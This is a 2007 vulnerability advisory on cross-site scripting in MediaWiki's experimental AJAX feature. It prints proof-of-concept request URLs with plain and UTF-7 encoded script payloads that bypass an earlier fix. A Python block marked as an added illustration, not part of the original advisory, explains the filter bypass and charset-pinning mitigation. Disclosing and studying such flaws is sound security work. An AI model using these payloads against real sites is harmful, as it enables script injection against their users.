MediaWiki Cross-site Scripting
eyal
BugSec.com
Date: Mon Feb 19 2007 - 22:29:01 CST
MediaWiki Cross-site Scripting Vulnerabilities.
Date: 18/02/2007
Vendor: MediaWiki
Vulnerable versions: MediaWiki 1.9.2 (latest) and below.
Description:
MediaWiki v1.8.2 and below are vulnerable to a plain cross-site scripting attack by exploiting the experimental AJAX features, if enabled (default). This XSS was fixed in post-1.8.2 versions (1.8.3, 1.9.0rc2, 1.9.0, 1.9.1, 1.9.2). That fix can be bypassed by encoding the XSS payload in UTF-7. Note: the browser's encoding auto-detection has to be enabled for successful exploitation.
Proof-of-concept:
http://[Host]/wiki/index.php?action=ajax&rs=[XSS]
In post-1.8.2 versions, the same parameter is exploitable with a UTF-7 encoded payload.
Examples:
v1.8.2 and below:
http://[Host]/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://www.bugsec.com')%3C/script%3E
v1.8.3 - v1.9.2:
http://[Host]/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http://www.bugsec.com');+ADw-/SCRIPT+AD4-
http://[Host]/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%54%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%43%52%49%50%54%2B%41%44%34%2D (URL Encoded)
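The following is an added illustration, not code from the advisory or from MediaWiki: it shows why an escape-on-output filter that only neutralises literal '<' and '>' lets a UTF-7 shifted payload through, and checks a response for the two conditions the advisory relies on (no explicit charset in the Content-Type header, plus a body whose UTF-7 decoding yields a tag). The header names, sample payloads and the example.invalid host are constructed for this example.

```python
import re
from html import escape

# Constructed sample inputs; the second mirrors the shape of the advisory's UTF-7 payload.
PLAIN_PAYLOAD = "<script>window.open('http://example.invalid')</script>"
UTF7_PAYLOAD = "+ADw-SCRIPT+AD4-window.open('http://example.invalid');+ADw-/SCRIPT+AD4-"

# A '+' followed by base64 text and an optional '-' terminator is a UTF-7 shift sequence.
UTF7_SHIFT = re.compile(r"\+[A-Za-z0-9+/]*-?")


def naive_filter(value: str) -> str:
    """Escape-on-output filter of the kind the advisory says was bypassed.

    It only rewrites literal <, >, &, " and ', so a UTF-7 payload passes untouched.
    """
    return escape(value, quote=True)


def decodes_to_markup(value: str) -> bool:
    """True when reading the ASCII text as UTF-7 produces a '<' that was not literally present."""
    if "<" in value or not UTF7_SHIFT.search(value):
        return False
    try:
        decoded = value.encode("ascii").decode("utf-7")
    except (UnicodeEncodeError, UnicodeDecodeError):
        return False
    return "<" in decoded


def charset_declared(headers: dict) -> bool:
    """A response is only safe from auto-detection if Content-Type names a charset."""
    return "charset=" in headers.get("Content-Type", "").lower()


def response_at_risk(headers: dict, body: str) -> bool:
    """Both advisory conditions must hold: no declared charset and a UTF-7 tag in the body."""
    return not charset_declared(headers) and decodes_to_markup(body)


def harden_headers(headers: dict) -> dict:
    """Pin the charset so the browser never falls back to encoding auto-detection."""
    fixed = dict(headers)
    fixed["Content-Type"] = "text/html; charset=UTF-8"
    return fixed


if __name__ == "__main__":
    weak = {"Content-Type": "text/html"}
    print("plain payload escaped:", naive_filter(PLAIN_PAYLOAD))
    print("UTF-7 payload after filter:", naive_filter(UTF7_PAYLOAD))
    print("at risk without charset:", response_at_risk(weak, naive_filter(UTF7_PAYLOAD)))
    print("at risk with charset pinned:", response_at_risk(harden_headers(weak), naive_filter(UTF7_PAYLOAD)))
```

Pinning the charset is the mitigation the advisory's own note implies: without encoding auto-detection the UTF-7 shift sequences are rendered as plain text. Filtering the shifted form as well gives defence in depth on the input side.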
Credit:
Moshe BA from BugSec
Tel:+972-3-9622655
Email: Info [^A-t] BugSec \*D.O.T*\ com
BugSec LTD. - www.BugSec.com
http://www.bugsec.com/articles.php?Security=24